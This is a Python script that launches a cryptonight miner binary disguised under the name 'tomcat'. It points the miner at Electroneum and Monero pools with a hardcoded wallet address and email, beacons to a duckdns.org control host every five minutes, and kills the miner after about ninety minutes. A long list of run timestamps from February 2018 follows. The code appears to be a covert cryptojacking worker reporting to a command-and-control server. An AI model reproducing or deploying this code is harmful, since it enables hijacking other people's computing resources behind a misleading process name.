import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:13:05.480855
#2018-02-17 17:01:06.593874
#2018-02-17 18:49:06.653105
#2018-02-17 20:41:05.485044
#2018-02-17 22:28:05.831246
#2018-02-18 00:11:01.399863
#2018-02-18 02:03:01.504302
#2018-02-18 03:51:04.757768
#2018-02-18 05:37:05.834486
#2018-02-18 07:30:07.312108
#2018-02-18 09:18:07.512178
#2018-02-18 11:04:04.448345
#2018-02-18 12:51:06.744038
#2018-02-18 14:39:04.991106
#2018-02-18 16:28:07.389575
#2018-02-18 18:17:05.104804
#2018-02-18 20:02:05.993828
#2018-02-18 21:49:01.422365
#2018-02-18 23:37:07.065226
#2018-02-19 01:23:06.155328
#2018-02-19 03:11:05.527088
#2018-02-19 04:56:06.541150
#2018-02-19 06:41:04.966131
#2018-02-19 08:31:01.907769
#2018-02-19 10:20:05.418851
#2018-02-19 12:08:07.453073
#2018-02-19 13:55:07.732290
#2018-02-19 15:44:07.917507
#2018-02-19 17:32:06.018860
#2018-02-19 19:21:05.864435
#2018-02-19 21:08:03.528944
#2018-02-19 22:54:07.345464
#2018-02-20 00:37:05.164000
#2018-02-20 02:26:01.367479
#2018-02-20 04:17:03.800092
#2018-02-20 06:01:06.549281
#2018-02-20 07:46:07.289353
#2018-02-20 09:31:01.492476
#2018-02-20 11:14:08.031120
#2018-02-20 13:02:06.121339
#2018-02-20 14:45:12.959547
#2018-02-20 16:33:08.453183
#2018-02-20 18:20:06.792379
#2018-02-20 20:13:05.717499
#2018-02-20 22:01:07.881115
#2018-02-20 23:42:08.257868
#2018-02-21 01:26:01.638109
#2018-02-21 03:14:05.709281
#2018-02-21 05:03:02.122923
#2018-02-21 06:50:06.797086
#2018-02-21 08:37:05.192591
#2018-02-21 10:22:06.734578
#2018-02-21 12:10:03.598547
#2018-02-21 13:58:07.155931
#2018-02-21 15:44:07.218644
#2018-02-21 17:36:05.051996
#2018-02-21 19:23:01.888381
#2018-02-21 21:13:07.400832
#2018-02-21 22:59:01.451611
#2018-02-22 00:46:08.080511
#2018-02-22 02:34:04.938766
#2018-02-22 04:20:08.367917
#2018-02-22 06:05:10.403626
#2018-02-22 07:51:05.521600
#2018-02-22 09:39:01.252581
#2018-02-22 11:24:05.960491
#2018-02-22 13:11:07.743487
#2018-02-22 14:59:06.844278
#2018-02-22 16:43:05.342997
#2018-02-22 18:29:08.732092
#2018-02-22 20:23:02.043836
#2018-02-22 22:08:06.934863
#2018-02-22 23:54:08.503851
#2018-02-23 01:44:01.326121
#2018-02-23 03:33:04.711962
#2018-02-23 05:19:07.064432
#2018-02-23 07:06:05.659729
#2018-02-23 08:57:07.507908
#2018-02-23 11:15:11.469337
#2018-02-23 13:10:08.160911
#2018-02-23 14:54:04.281545
#2018-02-23 16:42:10.956930
#2018-02-23 18:30:01.623068
#2018-02-23 20:14:05.287945
#2018-02-23 22:03:06.771132
#2018-02-23 23:51:01.773932
#2018-02-24 01:42:04.755939
#2018-02-24 03:33:01.696354
#2018-02-24 05:17:06.354753
#2018-02-24 07:05:05.249538
#2018-02-24 08:52:07.079046
#2018-02-24 10:52:03.589347
#2018-02-24 12:39:05.948815
#2018-02-24 14:27:07.180976
#2018-02-24 16:15:05.861454
#2018-02-24 18:08:01.872794
#2018-02-24 19:54:01.880905
#2018-02-24 21:38:06.007545
#2018-02-25 00:27:07.453904
#2018-02-25 04:23:05.567848
#2018-02-25 07:54:05.084099